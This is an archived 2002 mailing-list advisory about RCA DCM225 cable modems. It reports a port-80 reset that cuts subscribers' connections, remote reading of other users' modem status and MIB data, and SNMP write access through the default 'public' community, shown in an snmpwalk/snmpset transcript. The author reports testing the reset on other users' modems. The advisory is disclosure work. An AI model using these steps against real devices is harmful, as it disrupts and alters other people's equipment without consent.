------------------------------------------------------------------------------ Web: http://qb0x.net Author: Gabriel A. Maggiotti Date: March 26, 2002 E-mail: gmaggiotat_private ------------------------------------------------------------------------------ General Info ------------ Problem Type : deny of service, misconfiguration and leak of information Vendor : www.rca.com Product : RCA cablemodems Model : DCM225 (perhaps others) Scope : Remote Risk : High Summary: ------- The RCA Digital Cable Modem serves as a two-way high-speed bridge between your personal computer and a cable Internet Service Provider (ISP). i It converts information that originates from the Internet or your computer into electronic messages that can be transported over the same wires your cable company uses to transport video signals. Problem: ------- 1- Deny of Service: The RCA cable modem has two devices, the one for local connection is 192 .168.100.1 . This device is used for information request about the status of the cable. The other device is 10.x.x.x and gives the same information. If you connect to the second device (10.x.x.x) on port 80, RCA cable modem reset the user connection with inet. I proved it with my own wan ip 10.1.1 .x and with other cablemodem users IP's in the same wan. All of them reset when I remotly connect to port 80 of the cablemodems. 2- Leak of Information: I can connect to the wan IP 10.x.x.x of any cablemodem user in my node, and take a look at the users cablemodem status information such as: USB: Inactive Ethernet: 100 BaseT MAC Address: 00 10 95 0a 05 62 User: Active Signal Acquired at 573 MHz SNR: 36.0 dB Received Signal Strength: -4.0 dBmV Micro-Reflections: 20 dBc Connection: Acquired Frequency: 37 MHz Power Level: 44.0 dBmV Channel ID: 4 Number of user conected: 1 I can dump user cablemodem MIB's too. I can search in MIB table looking for my node server. I know that the node IP start with 10.x.x.x and I started to search in the MIB Ops, a found it! 69.1.4.2.0 = IpAddress: 10.20.250.1 69.1.4.3.0 = IpAddress: 10.20.250.1 69.1.4.4.0 = IpAddress: 10.20.250.1 69.1.4.5.0 = "docsis_light_avalos" And then I recognize the word "avalos" becouse is the name of the street where the node fisicaly is. 3- Misconfiguration cause you can write my own MIB table. Take a look: <quote> [gabi@pluto gabi]$ snmpwalk 192.168.100.1 public system.sysDescr.0 = RCA DCM225 Cable Modem serial no. 65731049496572, HW_Version 025 (03.1), SW_Version ST05.14.00, Bootloader_Ver 11.1, OS: PSOS 2.5.0 system.sysObjectID.0 = OID: enterprises.2863.225.25.5.20.0 system.sysUpTime.0 = Timeticks: (141857) 0:23:38.57 system.sysContact.0 = unassigned sysContact system.sysName.0 = system.sysLocation.0 = system.sysServices.0 = 79 [gabi@pluto gabi]$ snmpset 192.168.100.1 public system.sysName.0 s lame system.sysName.0 = lame [gabi@pluto gabi]$ snmpset 192.168.100.1 public system.sysLocation.0 s lame_cyty system.sysName.0 = lame_city [gabi@pluto gabi]$ snmpwalk 192.168.100.1 public system.sysDescr.0 = RCA DCM225 Cable Modem serial no. 65731049496572, HW_Version 025 (03.1), SW_Version ST05.14.00, Bootloader_Ver 11.1, OS: PSOS 2.5.0 system.sysObjectID.0 = OID: enterprises.2863.225.25.5.20.0 system.sysUpTime.0 = Timeticks: (161396) 0:26:53.96 system.sysContact.0 = unassigned sysContact system.sysName.0 = lame system.sysLocation.0 = lame_city system.sysServices.0 = 79 </quote> ------------------------------------------------------------------------------ research-listat_private is dedicated to interactively researching vulnerab- ilities, report potential or undeveloped holes in any kind of computer system. To subscribe to research-listat_private t send a blank email to research-list-subscribeat_private More help available sending an email to research-list-helpat_private Note: the list doesn't allow html, it will be stripped from messages. ------------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Wed Mar 27 2002 - 13:23:41 PST